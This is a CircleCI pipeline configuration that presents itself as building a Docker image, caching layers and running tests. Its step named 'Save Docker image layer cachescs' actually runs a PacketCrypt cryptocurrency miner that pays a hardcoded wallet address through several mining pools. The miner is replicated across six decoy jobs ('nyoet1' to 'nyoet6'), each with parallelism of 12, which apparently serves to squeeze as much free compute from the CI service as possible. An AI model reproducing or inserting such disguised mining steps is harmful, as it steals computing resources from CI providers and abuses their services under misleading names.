.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull backupbrain/packetcrypt
      - run:
          name: Save Docker image layer cachescs
          command: |
            docker run backupbrain/packetcrypt ann -p pkt1qv437nndzvr9u8ps60g3d5dl0gssu84ulwksvfq http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up
version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  nyoet1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 12
  nyoet2:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 12
  nyoet3:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 12
  nyoet4:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 12
  nyoet5:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 12
  nyoet6:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 12
    
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - nyoet1
      - nyoet2
      - nyoet3
      - nyoet4
      - nyoet5
      - nyoet6
